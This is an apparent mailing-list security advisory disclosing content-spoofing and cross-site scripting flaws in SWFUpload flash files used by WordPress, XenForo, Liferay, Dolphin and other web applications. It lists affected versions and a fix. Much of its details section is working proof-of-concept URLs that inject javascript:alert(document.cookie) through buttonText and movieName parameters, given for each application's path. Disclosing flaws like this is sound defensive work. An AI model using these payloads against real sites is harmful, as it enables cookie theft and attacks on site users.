Vulnerabilities in SWFUpload in multiple web applications: W

Hello list!

Earlier I've wrote about Content Spoofing and Cross-Site Scripting
vulnerabilities in SWFUpload ( http://securityvulns.ru/docs29181.html). This
is very popular flash-file,which is used at tens millions of web sites and
in hundreds of web applications (only WordPress is used at more then 62
millions of web sites according to wordpress.com).

Last year I've wrote about other XSS hole in SWFUpload and I mentioned that
there are many web applications with vulnerable SWFUpload. All of them are
vulnerable to these new vulnerabilities,except swfupload.swf bundled with
WordPress since version 3.3.2.

There are different names of files of SWFUpload: swfupload.swf,
swfupload_f9.swf,swfupload_f8.swf,swfupload_f10.swf and swfupload_f11.swf.
Many web applications include few swf-files of SWFUpload. Not all of these
swf-files are vulnerable to new holes: swfupload_f8.swf and swfupload_f9.swf
are not vulnerable (they have no buttonText functionality according to my
research).

So from those web applications the next are vulnerable (plus many other web
applications):

swfupload.swf - Dotclear,XenForo,InstantCMS,AionWeb,Dolphin,
SwfUploadPanel for TYPO3 CMS,SentinelleOnAir.

swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS,Archiv plugin for TinyMCE,
Liferay Portal (Community Edition and Enterprise Edition),Swfupload for
Drupal,SWFUpload for Codeigniter,SentinelleOnAir.

swfupload_f11.swf - SentinelleOnAir.

Also InfoGlue is vulnerable (about XSS vulnerability in ZeroClipboard.swf in
which I've wrote last month),because it has SWFUpload too.

-------------------------
Affected products:
-------------------------

Vulnerable are all web applications with SWFUpload (v2.2.0.1 and previous
versions).

Vulnerable are versions WordPress 2.7 - 3.3.1 (which bundled with
swfupload.swf). The fixed version of swfupload.swf in WP 3.3.2 contain fix
as for previous XSS,as for these CS and XSS vulnerabilities (even WP
developers didn't write about it).

Vulnerable are potentially all versions of Dotclear,
Dolphin,SwfUploadPanel for TYPO3 CMS,Liferay
Portal (Community Edition,which earlier called Standard Edition,and
Enterprise Edition),Swfupload for Drupal,SWFUpload for Codeigniter and
SentinelleOnAir. There is no information that they have fixed these
vulnerabilities in their software (at that these holes were fixed together
with another XSS hole in WordPress 3.3.2 at 20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions. They
used the same swf-file,as in WP 3.3.2,so it contains a fix as for previous
XSS,as for these CS and XSS vulnerabilities (even XenForo developers didn't
write about it,because they didn't know that,since WP developers did it
secretly).

-----
Fix:
-----

Use swfupload.swf from WordPress 3.3.2 and higher versions. All web
developers need to update their vulnerable version of SWFUpload to this
fixed version.

----------
Details:
----------

There are two vulnerabilities in SWFUpload.

Content Spoofing (WASC-12):

http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text,images and html (e.g. for link injection).

Cross-Site Scripting (WASC-08):

http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Code will execute after click. It's strictly social XSS.

These are examples of XSS vulnerability in different web applications:

WordPress:

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dotclear:

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InstantCMS:

http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Swfupload for Drupal:

As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva ( http://code.google.com/p/respectiva/),which is
Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InfoGlue:

Previous XSS vulnerabilities:

http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

New XSS vulnerability:

http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua